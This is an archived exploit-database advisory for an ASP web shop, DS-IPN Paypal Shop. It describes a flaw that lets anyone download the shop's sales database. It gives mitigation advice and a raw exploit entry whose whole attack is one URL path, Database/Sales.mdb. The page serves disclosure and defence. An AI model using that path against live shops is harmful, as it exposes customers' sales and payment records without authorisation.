DS-IPN Paypal Shop Remote Database Disclosure Vulnerability

vendor:

DS-IPN Paypal Shop

by:

Moudi

8.5

CVSS

HIGH

Remote Database Disclosure

200

CWE

Product Name: DS-IPN Paypal Shop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DS-IPN Paypal Shop Remote Database Disclosure Vulnerability

DS-IPN Paypal Shop is prone to a remote database disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. This issue affects the 'Database/Sales.mdb' file.

Mitigation:

Users should upgrade to the latest version of DS-IPN Paypal Shop. Additionally, users should ensure that the 'Database/Sales.mdb' file is not accessible from the web.

Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [Â»] We love Palestine, stop the war, too many innocent people!!
==============================================================================
    DS-IPN Paypal Shop Remote Database Disclosure Vulnerability
==============================================================================

	[Â»] Script:             [ DS-IPN Paypal Shop  ]
	[Â»] Language:           [ ASP ]
	[Â»] Website:            [ http://shop.robs-projects.com/product_DS-IPN.html ]
	[Â»] Founder:            [ Moudi <m0udi@9.cn> ]
        [Â»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
        [Â»] Team:               [ EvilWay ]
        [Â»] SiteWeb:            [ www.evilway.org ]

###########################################################################

===[ Exploit ]===	
	
	[Â»] http://localhost/[path]/Database/Sales.mdb


Author: Moudi

###########################################################################

# milw0rm.com [2009-01-18]